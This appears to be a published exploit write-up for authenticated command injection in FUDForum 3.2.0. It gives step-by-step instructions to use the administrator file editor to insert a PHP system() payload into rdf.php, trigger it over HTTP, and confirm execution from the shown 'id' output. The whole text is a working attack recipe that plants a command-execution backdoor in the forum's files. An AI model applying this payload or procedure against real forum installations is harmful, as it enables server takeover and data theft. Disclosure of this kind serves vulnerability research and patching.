# Exploit Title: FUDForum 3.2.0 Command Injection Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.2.0.zip/download
# Version : 3.2.0


1. Log in with valid administrator credentials.
2. Click Files > File Administration System 
Navigate to: https://127.0.0.1/FUDforum/adm/admbrowse.php
2. Inject Payload
3. Edit rdf.php and insert:
<?php echo system('id'); ?>
4. Save modifications.
5. Trigger Execution
Access: https://127.0.0.1/FUDforum/rdf.php
6. Verify Results
uid=1003(fud) gid=1004(fud) groups=1004(fud)